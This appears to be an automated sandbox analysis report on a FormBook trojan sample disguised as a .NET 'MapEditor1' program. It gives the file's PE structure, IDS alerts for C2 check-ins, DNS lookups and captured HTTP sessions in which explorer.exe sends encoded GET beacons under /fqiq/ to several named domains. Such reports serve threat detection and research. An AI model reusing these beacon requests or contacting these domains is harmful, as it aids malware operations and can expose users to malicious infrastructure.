                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x5b6180x5b800False0.880715292008data7.77424395601IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x5e0000x18ca40x18e00False0.195381202889data5.07070154334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x5e1800x468GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x5e5f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x5f6b00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x61c680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x65ea00x10828dBase III DBT, version number 0, next free block index 40
                                                  RT_GROUP_ICON0x766d80x4cdata
                                                  RT_VERSION0x767340x370data
                                                  RT_MANIFEST0x76ab40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright Gottschalks 2011
                                                  Assembly Version1.0.0.0
                                                  InternalNameDateTimeFormatFla.exe
                                                  FileVersion1.0.0.0
                                                  CompanyNameGottschalks
                                                  LegalTrademarks
                                                  Comments
                                                  ProductNameMapEditor1
                                                  ProductVersion1.0.0.0
                                                  FileDescriptionMapEditor1
                                                  OriginalFilenameDateTimeFormatFla.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  10/13/21-19:47:34.244388TCP1201ATTACK-RESPONSES 403 Forbidden804976723.227.38.74192.168.2.5
                                                  10/13/21-19:47:40.620774ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                  10/13/21-19:47:40.694370TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.5104.165.34.6
                                                  10/13/21-19:47:40.694370TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.5104.165.34.6
                                                  10/13/21-19:47:40.694370TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.5104.165.34.6
                                                  10/13/21-19:48:01.554977TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.5108.167.135.122
                                                  10/13/21-19:48:01.554977TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.5108.167.135.122
                                                  10/13/21-19:48:01.554977TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.5108.167.135.122
                                                  10/13/21-19:48:12.861304TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981280192.168.2.58.212.24.67
                                                  10/13/21-19:48:12.861304TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981280192.168.2.58.212.24.67
                                                  10/13/21-19:48:12.861304TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981280192.168.2.58.212.24.67

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 13, 2021 19:47:34.178965092 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.196883917 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.197135925 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.197210073 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.213325977 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244388103 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244424105 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244447947 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244472980 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244493961 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244508982 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244515896 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.244524002 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244680882 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.244837999 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:40.524382114 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.694076061 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:40.694190025 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.694370031 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.867327929 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:40.867357969 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:40.867674112 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.867718935 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:41.038270950 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:45.901201963 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.919284105 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.919430017 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.919836998 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.938008070 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.938915014 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.938937902 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.939183950 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.939256907 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.959599018 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:51.185455084 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.203566074 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.203690052 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.203907013 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.221406937 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.249383926 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.249403954 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.249562025 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.249701023 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.267669916 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:48:01.420226097 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.553453922 CEST8049789108.167.135.122192.168.2.5
                                                  Oct 13, 2021 19:48:01.553663969 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.554976940 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.689186096 CEST8049789108.167.135.122192.168.2.5
                                                  Oct 13, 2021 19:48:01.689218998 CEST8049789108.167.135.122192.168.2.5
                                                  Oct 13, 2021 19:48:01.689506054 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.689524889 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.822371960 CEST8049789108.167.135.122192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 13, 2021 19:47:34.126564980 CEST5244153192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:34.165796995 CEST53524418.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:39.315068960 CEST6217653192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:40.339004993 CEST6217653192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:40.522993088 CEST53621768.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:40.620671988 CEST53621768.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:45.876126051 CEST5959653192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:45.900255919 CEST53595968.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:50.995863914 CEST6318353192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:51.184072018 CEST53631838.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:48:01.289443970 CEST5696953192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:48:01.419078112 CEST53569698.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:48:06.706549883 CEST5475753192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:48:07.117193937 CEST53547578.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:48:12.124536991 CEST4999253192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:48:12.523261070 CEST53499928.8.8.8192.168.2.5

                                                  ICMP Packets

                                                  TimestampSource IPDest IPChecksumCodeType
                                                  Oct 13, 2021 19:47:40.620774031 CEST192.168.2.58.8.8.8d007(Port unreachable)Destination Unreachable

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Oct 13, 2021 19:47:34.126564980 CEST192.168.2.58.8.8.80xa732Standard query (0)www.ribbonofficial.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:39.315068960 CEST192.168.2.58.8.8.80x470Standard query (0)www.sanlifalan.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:40.339004993 CEST192.168.2.58.8.8.80x470Standard query (0)www.sanlifalan.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:45.876126051 CEST192.168.2.58.8.8.80x72c7Standard query (0)www.floaterslaser.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:50.995863914 CEST192.168.2.58.8.8.80xfc77Standard query (0)www.mambacustomboats.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:01.289443970 CEST192.168.2.58.8.8.80x3effStandard query (0)www.esyscoloradosprings.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:06.706549883 CEST192.168.2.58.8.8.80xa9c5Standard query (0)www.begukiu0.infoA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:12.124536991 CEST192.168.2.58.8.8.80x6a9bStandard query (0)www.kangrungao.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Oct 13, 2021 19:47:34.165796995 CEST8.8.8.8192.168.2.50xa732No error (0)www.ribbonofficial.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:47:34.165796995 CEST8.8.8.8192.168.2.50xa732No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:40.522993088 CEST8.8.8.8192.168.2.50x470No error (0)www.sanlifalan.com104.165.34.6A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:40.620671988 CEST8.8.8.8192.168.2.50x470No error (0)www.sanlifalan.com104.165.34.6A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:45.900255919 CEST8.8.8.8192.168.2.50x72c7No error (0)www.floaterslaser.comfloaterslaser.comCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:47:45.900255919 CEST8.8.8.8192.168.2.50x72c7No error (0)floaterslaser.com81.169.145.161A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:51.184072018 CEST8.8.8.8192.168.2.50xfc77No error (0)www.mambacustomboats.com64.190.62.111A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:01.419078112 CEST8.8.8.8192.168.2.50x3effNo error (0)www.esyscoloradosprings.comwebsites076.homestead.comCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:48:01.419078112 CEST8.8.8.8192.168.2.50x3effNo error (0)websites076.homestead.com108.167.135.122A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:07.117193937 CEST8.8.8.8192.168.2.50xa9c5Name error (3)www.begukiu0.infononenoneA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:12.523261070 CEST8.8.8.8192.168.2.50x6a9bNo error (0)www.kangrungao.coma.mb.cnCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:48:12.523261070 CEST8.8.8.8192.168.2.50x6a9bNo error (0)a.mb.cn8.212.24.67A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.ribbonofficial.com
                                                  • www.sanlifalan.com
                                                  • www.floaterslaser.com
                                                  • www.mambacustomboats.com
                                                  • www.esyscoloradosprings.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.54976723.227.38.7480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:34.197210073 CEST5785OUTGET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1
                                                  Host: www.ribbonofficial.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:34.244388103 CEST5786INHTTP/1.1 403 Forbidden
                                                  Date: Wed, 13 Oct 2021 17:47:34 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Sorting-Hat-PodId: 216
                                                  X-Sorting-Hat-ShopId: 59389116584
                                                  X-Dc: gcp-europe-west1
                                                  X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963
                                                  X-Content-Type-Options: nosniff
                                                  X-Permitted-Cross-Domain-Policies: none
                                                  X-XSS-Protection: 1; mode=block
                                                  X-Download-Options: noopen
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 69da64d2c8f74303-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
                                                  Oct 13, 2021 19:47:34.244424105 CEST5788INData Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72
                                                  Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
                                                  Oct 13, 2021 19:47:34.244447947 CEST5789INData Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69
                                                  Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                  Oct 13, 2021 19:47:34.244472980 CEST5791INData Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0
                                                  Data Ascii: ", "content-title": " " }, "ja": { "title": "
                                                  Oct 13, 2021 19:47:34.244493961 CEST5791INData Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75
                                                  Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
                                                  Oct 13, 2021 19:47:34.244508982 CEST5791INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.549768104.165.34.680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:40.694370031 CEST5793OUTGET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
                                                  Host: www.sanlifalan.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:40.867327929 CEST5793INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Wed, 13 Oct 2021 17:47:40 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 781
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e d5 d8 c7 ec c3 cc d6 c2 bd a8 b2 c4 d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.54976981.169.145.16180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:45.919836998 CEST5794OUTGET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1
                                                  Host: www.floaterslaser.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:45.938915014 CEST5795INHTTP/1.1 404 Not Found
                                                  Date: Wed, 13 Oct 2021 17:47:45 GMT
                                                  Server: Apache/2.4.51 (Unix)
                                                  Content-Length: 196
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
